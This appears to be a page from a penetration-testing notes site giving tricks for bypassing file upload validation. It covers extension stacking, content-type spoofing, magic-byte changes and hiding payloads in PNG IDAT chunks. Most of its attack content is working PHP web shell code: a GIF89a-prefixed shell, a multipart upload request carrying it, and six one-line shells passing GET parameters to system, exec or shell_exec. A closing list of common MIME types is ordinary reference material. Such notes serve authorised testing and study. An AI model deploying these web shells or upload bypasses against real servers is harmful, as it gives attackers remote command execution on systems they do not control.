File Upload Tricks

When uploading files , check for validation on :

  1. File extension

    • Server side extension allowed ? :

    php
phtml
php4

    • Stacking / Double Extension

    .php.png
.%20.php

Using gif (shell.php)

GIF89a;
<?php
system($_GET['cmd']);
?>

Advanced gif 

Content-Disposition: form-data; name="upload"; filename="web.php"
Content-Type: image/png

GIF89a;
<?php
system($_GET['cmd']);
?>

  1. Content-Type header

  • Is server extension like php able to bypass the upload restriction ?

- If yes , just change content-type header to like image and it will still run as php.

  • Does the server validate content-type header like disallow application/json?

  1. Magic bytes (file hex value)

  • Does the server check file signature ?

  • If no , can change file signature using hexedit

PHP Function Exploit

imagecopyresampled imagecreatefromstring

solution :Hide the webshell in the IDAT chunk of PNG

https://github.com/huntergregal/PNG-IDAT-Payload-Generator/tree/master
python3 generate.py -m php -o webshell.png

Rename to webshell.png.php

Shell exec

php

shell_exec() , exec() , system()

Examples

<?php echo shell_exec($_GET['command']); ?>
<?php echo exec($_GET['command']); ?>
<?php echo system($_GET['command']); ?>
<?php echo exec($_GET['e'].' 2>&1'); ?>
<?php system($_GET['e'].' 2>&1'); ?>
<?php echo shell_exec($_GET['e'].' 2>&1'); ?>

Content-Types of Common Files

Pictures :

image/png
image/jpeg
image/gif

JSON :

application/json

PHP :

application/x-php
application/x-www-form-urlencoded
multipart/form-data
application/octet-stream

TXT :

text/plain

XML :

application/xml  
text/xml

HTML :

text/html

JAVASCRIPT :

text/javascript
application/javascript

PDF

application/pdf

AUDIO

audio/mpeg
audio/wav

VIDEO

video/mp4
video/quicktime
PreviousDirectory Brute ForcingNextPHP htaccess and ASP web.config bypass

Last updated

Was this helpful?